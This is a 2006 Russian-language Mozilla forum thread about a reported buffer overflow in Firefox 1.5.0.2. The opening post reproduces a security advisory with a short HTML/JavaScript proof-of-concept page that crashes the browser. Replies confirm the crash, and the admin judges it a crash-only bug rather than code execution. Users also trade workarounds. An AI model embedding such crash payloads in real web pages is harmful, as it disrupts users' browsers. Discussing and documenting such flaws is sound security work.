Полезная информация

Общайтесь со знакомыми и друзьями в нашей группе в Контакте.

№125-04-2006 12:30:33

apocalypse_2010
Участник
 
Группа: Members
Зарегистрирован: 16-12-2005
Сообщений: 95

Переполнение буфера в Mozilla Firefox

25 апреля, 2006
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.

Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:

<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
  <script>
       var textarea = document.getElementsByName("x_OtherInfo");
       textarea=textarea.item(0);
           var htmlarea = document.createElement("div");
       htmlarea.className = "htmlarea"; 
       textarea.parentNode.insertBefore(htmlarea, textarea);
       var iframe = document.createElement("iframe");
       htmlarea.appendChild(iframe);
            var doc = iframe.contentWindow.document;
                 doc.designMode = "on";
                 doc.open();
                 doc.write("<iframe src=''>");
          iframe.contentWindow.focus()
  doc.close();
  </script>
</textarea>

Решение: Способов устранения уязвимости не существует в настоящее время.

Отсутствует

 

№225-04-2006 16:16:32

TLemur
Забанен
 
Группа: Members
Зарегистрирован: 18-10-2004
Сообщений: 1764

Re: Переполнение буфера в Mozilla Firefox

Скопировал. Кликнул по полю ввода. Firefox 1.5.0.2 вывалился.
Временное решение: Запретить выполнение JavaScript с помощью, например, NoScript.

Отсутствует

 

№325-04-2006 17:32:02

Xeningem
Участник
 
Группа: Members
Зарегистрирован: 08-09-2005
Сообщений: 412

Re: Переполнение буфера в Mozilla Firefox

Люди... Извините, сам проверить не могу, но судя по LOR (http://www.linux.org.ru/view-message.jsp?msgid=1367875&page=0) - поддвержены именно 1.5.0.2 версии...


Everyone is always connected. Serial Experiments Opera.

Отсутствует

 

№425-04-2006 18:02:59

Sniper_gf
Участник
 
Группа: Members
Зарегистрирован: 17-03-2006
Сообщений: 188

Re: Переполнение буфера в Mozilla Firefox

Да, действительно, ФФ вылетает

Отсутствует

 

№525-04-2006 19:39:28

stoneflash
Хитрый Лис
 
Группа: Extensions
Откуда: Msk
Зарегистрирован: 02-04-2006
Сообщений: 4341

Re: Переполнение буфера в Mozilla Firefox

Ага. Результат аналогичен. Прыгать на версию назад, что ли?


«I actually hate programming, but I love solving problems» © Rasmus Lerdorf, PHP's Creator

Отсутствует

 

№625-04-2006 20:12:21

krigstask
друг народа
 
Группа: Members
Откуда: Rampova, Inkerimaa
Зарегистрирован: 13-09-2005
Сообщений: 4593
Веб-сайт

Re: Переполнение буфера в Mozilla Firefox

Ага. Результат аналогичен. Прыгать на версию назад, что ли?

Получишь 21 критическую уязвимость (-;Е


Ядрёная консоль делает меня сильней!

Отсутствует

 

№725-04-2006 20:52:23

stoneflash
Хитрый Лис
 
Группа: Extensions
Откуда: Msk
Зарегистрирован: 02-04-2006
Сообщений: 4341

Re: Переполнение буфера в Mozilla Firefox

krigstask
Млин, меж двух огней. Выбераю наименьшее  зло.


«I actually hate programming, but I love solving problems» © Rasmus Lerdorf, PHP's Creator

Отсутствует

 

№825-04-2006 22:01:17

Почесал
Участник
 
Группа: Members
Зарегистрирован: 24-02-2005
Сообщений: 3957

Re: Переполнение буфера в Mozilla Firefox

Ага. Результат аналогичен. Прыгать на версию назад, что ли?

Тебе это так жить мешает?

Отсутствует

 

№925-04-2006 22:04:33

stoneflash
Хитрый Лис
 
Группа: Extensions
Откуда: Msk
Зарегистрирован: 02-04-2006
Сообщений: 4341

Re: Переполнение буфера в Mozilla Firefox

Почесал
Сейчас вообще по барабану. Мало ли - стукнет.


«I actually hate programming, but I love solving problems» © Rasmus Lerdorf, PHP's Creator

Отсутствует

 

№1026-04-2006 00:12:54

Unghost
Призрак-админ
 
Группа: Administrators
Откуда: Moscow, Russia
Зарегистрирован: 08-10-2004
Сообщений: 11771

Re: Переполнение буфера в Mozilla Firefox

Если эта уязвимость то же самое, что описано на http://secunia.com/advisories/19802/ (что и есть, судя тому что пути к "эксплоиту" совпадают) - то эта уязвимость не позволяет выполнить   "произвольный код на целевой системе", а является банальным кодом валящим браузер.
Опасность - 1 из 5, ничего интересного.


Do not meddle in the affairs of Wizards, for they are subtle and quick to anger.

Отсутствует

 

№1126-04-2006 00:16:57

Unghost
Призрак-админ
 
Группа: Administrators
Откуда: Moscow, Russia
Зарегистрирован: 08-10-2004
Сообщений: 11771

Re: Переполнение буфера в Mozilla Firefox

Кому интересно, могут прочесть http://forums.mozillazine.org/viewtopic.php?t=408603


Do not meddle in the affairs of Wizards, for they are subtle and quick to anger.

Отсутствует

 

№1226-04-2006 00:33:10

Tearis
Участник
 
Группа: Members
Откуда: Воронеж
Зарегистрирован: 18-12-2005
Сообщений: 115

Re: Переполнение буфера в Mozilla Firefox

Unghost
А оно так и есть. Обычное переполнение буфера, ничего нового.


Кому ничего не надо, с того нечего и потребовать.
©Генри Филдинг

Отсутствует

 

№1326-04-2006 02:14:50

INFOMAN
Телепаты в отпуске
 
Группа: Extensions
Откуда: Кишинев
Зарегистрирован: 31-12-2005
Сообщений: 1099
Веб-сайт

Re: Переполнение буфера в Mozilla Firefox

:::: Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.8.0.2) Gecko/20060405 SeaMonkey/1.0.1 тоже падает


Закрой кран
Включи свет ©
Fire! Kill IE is your desire | NULL | NULL

Отсутствует

 

№1426-04-2006 11:26:24

apocalypse_2010
Участник
 
Группа: Members
Зарегистрирован: 16-12-2005
Сообщений: 95

Re: Переполнение буфера в Mozilla Firefox

КСТАТЕ вот источник откуда я это скопировал http://www.securitylab.ru/vulnerability/266229.php  ОЧЕНЬ ХОРОШИЙ САЙТ!

Отсутствует

 

№1526-04-2006 15:33:37

Tearis
Участник
 
Группа: Members
Откуда: Воронеж
Зарегистрирован: 18-12-2005
Сообщений: 115

Re: Переполнение буфера в Mozilla Firefox

Решение: Способов устранения уязвимости не существует в настоящее время.

Существует, поставить v2.0a1, например.

:::: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1 - не падает.


Кому ничего не надо, с того нечего и потребовать.
©Генри Филдинг

Отсутствует

 

№1626-04-2006 23:33:37

Zmeys
Участник
 
Группа: Members
Зарегистрирован: 22-11-2005
Сообщений: 173

Re: Переполнение буфера в Mozilla Firefox

Tearis
поставить v2.0a1, например.

Начиная с 25-го в nightly/latest 1.5.0.2 поехали локализации (включая и mar-файлы), на сегодня уже почти полный набор. Русская, к примеру, проявилась - 25-Apr-2006 19:53. Мне просто некогда качать и проверять (сам на .0.3-й), ежели кого плющит по безопасности - попробуйте.

Отсутствует

 

Board footer

Powered by PunBB
Modified by Mozilla Russia
Copyright © 2004–2020 Mozilla Russia GitHub mark
Язык отображения форума: [Русский] [English]